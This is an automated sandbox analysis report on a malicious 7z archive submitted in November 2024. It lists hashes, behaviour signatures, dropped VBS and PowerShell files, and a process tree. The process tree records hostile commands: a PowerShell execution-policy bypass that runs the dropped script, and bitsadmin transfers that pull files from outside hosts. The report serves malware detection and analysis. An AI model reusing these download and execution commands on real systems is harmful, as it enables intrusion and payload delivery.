Analysis

  • max time kernel
    259s
  • max time network
    256s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 21:26

General

  • Target

    ckJTQEOKC_28_11_2024.zip.7z

  • Size

    27KB

  • MD5

    28392dc4be3ecbc57953c605981affdc

  • SHA1

    fa897706e7e4ade0d35a3e2f6d0637c897fef777

  • SHA256

    2da77359f85bbc09c5ea5a4dd2f768e16079bbff9ae22a7cf84e4411bd65d1cb

  • SHA512

    e519bff9d5f41e519dba9e0d31dbc020f0b61b2157533becf8ee0508577a31f8fa6075e7f7d41566346751578a7a32967a62ad166da9cf47c1383bd943cc2a69

  • SSDEEP

    768:wqRsZXvxy2Wwbmqd1hBv4yUevPXp+9NaP996:wqRs5FWwbmq3bZPXp+9N

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC_28_11_2024.zip.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:428
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:5092
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"
      1⤵
        PID:2444
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1"
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:4592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1'"
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\system32\getmac.exe
          "C:\Windows\system32\getmac.exe" /fo table
          2⤵
            PID:4924
          • C:\Windows\system32\bitsadmin.exe
            "C:\Windows\system32\bitsadmin.exe" /reset
            2⤵
              PID:684
          • C:\Windows\system32\bitsadmin.exe
            bitsadmin /transfer mBqCIf /priority FOREGROUND "https://ghryj.eu/post//7e3210e6d8b2a6a7e2282c08bd060468.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_svchost.log
            1⤵
            • Process spawned unexpected child process
            • Download via BitsAdmin
            PID:2040
          • C:\Windows\system32\bitsadmin.exe
            bitsadmin /transfer caAxKn /priority FOREGROUND "https://uhfb.eu/post//7e3210e6d8b2a6a7e2282c08bd060468.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_svchost.log
            1⤵
            • Process spawned unexpected child process
            • Download via BitsAdmin
            PID:5104

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tamwgwf.gax.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_msedge.log

            Filesize

            32B

            MD5

            fb2d4b4538f231805a677bf1fdae7618

            SHA1

            9af3e31cad8f69e7d61f81005f8d7bb615ceea05

            SHA256

            07bd6fa0bfb02d25cb31d8d9bb31653912671394c0fb1e8b10296682448627f2

            SHA512

            d2fecf45f070e5cd752afdc6b229ffe6027ee12c726e98cc867ceb19990f964cd084de24312530c9d65a9b7ad7ad51d3d9a82c444d56a5a8cb78d65a636b6f05

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_msedge.log

            Filesize

            32B

            MD5

            c5f79e50e9f1426aed3a210a3a5e8c4d

            SHA1

            7c8dfd39f669d241205219f066a022e028749d8e

            SHA256

            89e9165ac6d056ca646a831e17d0c0f8877a7ebc9adba1665be6a6b60d9636aa

            SHA512

            20ac36e6a588077a038c894ebc0bd53966210b94706674e8ebc5e852463123c7f6a1255769949c29e70e4c75d179af3dfc77501cd5c7c3d6fbf0d92453074d41

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1

            Filesize

            2KB

            MD5

            9d6d8a084805bbf5d22507780d14e8f4

            SHA1

            27ebc6c5948855d6b5a7f1c5422a3be6a4a1e77a

            SHA256

            9092a282a5c56c0a19713fd3067b528efae5b27e9faa737c87a9bbf6a566cc5e

            SHA512

            a8142d16469fb415ad3f9212d52f0aadde797876e7735f3faebd79b57acd04688726e83047c808851ea9394b14dca0dad8c33a1e7695c4ce2a768d46a2f3597b

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs

            Filesize

            876B

            MD5

            fd4e455ea3f14f99f5f9b66b4e0ef6d9

            SHA1

            001bf670b7c829cb9d0ffb82a13ff2a65b1cb969

            SHA256

            1cc49c3a3e3d7af8deea30253f7f0b2486b6de8f51c7ab1b420b22f5918005fc

            SHA512

            f9b228ce9358013b92db3803fc6c81d7badf3917d7814d36ee43885b548558c1fbb3e4658d6f2ce752331d51d79898060071d475617810b3103eec8f85320d3b

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\darm.chh

            Filesize

            1KB

            MD5

            6b831ce8380c693ee6070ad424c9f92b

            SHA1

            b87e2ef196383c246b996c4764e328d523b5c5b7

            SHA256

            a65d23c0df6c750741bb63dee3564ea44462a07050f54a3b585d2c0c4b943e35

            SHA512

            d333149446bd5e83310037b293b1cd73d3a2a15fa9b10ccbcda5fcac70b67e53e86aea4b7c7e0f567106ba3ca45c9856ccc69db7fd75b2d272397e92abf503e4

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\lite.chh

            Filesize

            95KB

            MD5

            960716f6d0c819d551f68b970faff1f9

            SHA1

            f23ca0bafec43bd8ba899190d290ab9db97b7b07

            SHA256

            a83be5df3bb0b2b83a3727b50d0ebd74b8d0ef425a29f1352095260e12569192

            SHA512

            50fc39e4a1d3cb91ebc76dfe1eaf5f32fb4871957d57d67c0bbde29dd0f97412f945db442a4f95b3b7f69f1148fe68df7f76621493ad64f742052b333fbe5f25

          • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\msedge.log

            Filesize

            16B

            MD5

            49fa9b3510c1cbf6d6df2f4a2f9f8e65

            SHA1

            3c1c22697e4370100ef87a52084d7c14fbf657d3

            SHA256

            fcbccd7b328d9270a0f3820ecf622f6e14c09df6061f2275cb9524673b681acf

            SHA512

            8870d64fb90035f6a8735c1bc8452ef516fd26de8472bdd4fc2e8d23a1a4b65566e954b1e3711a460ece543325389a487fdfc5ac477af8617b658e930ffd721f

          • memory/4584-18-0x0000016BC9290000-0x0000016BC92B2000-memory.dmp

            Filesize

            136KB

          • memory/4584-32-0x0000016BC9EF0000-0x0000016BCA418000-memory.dmp

            Filesize

            5.2MB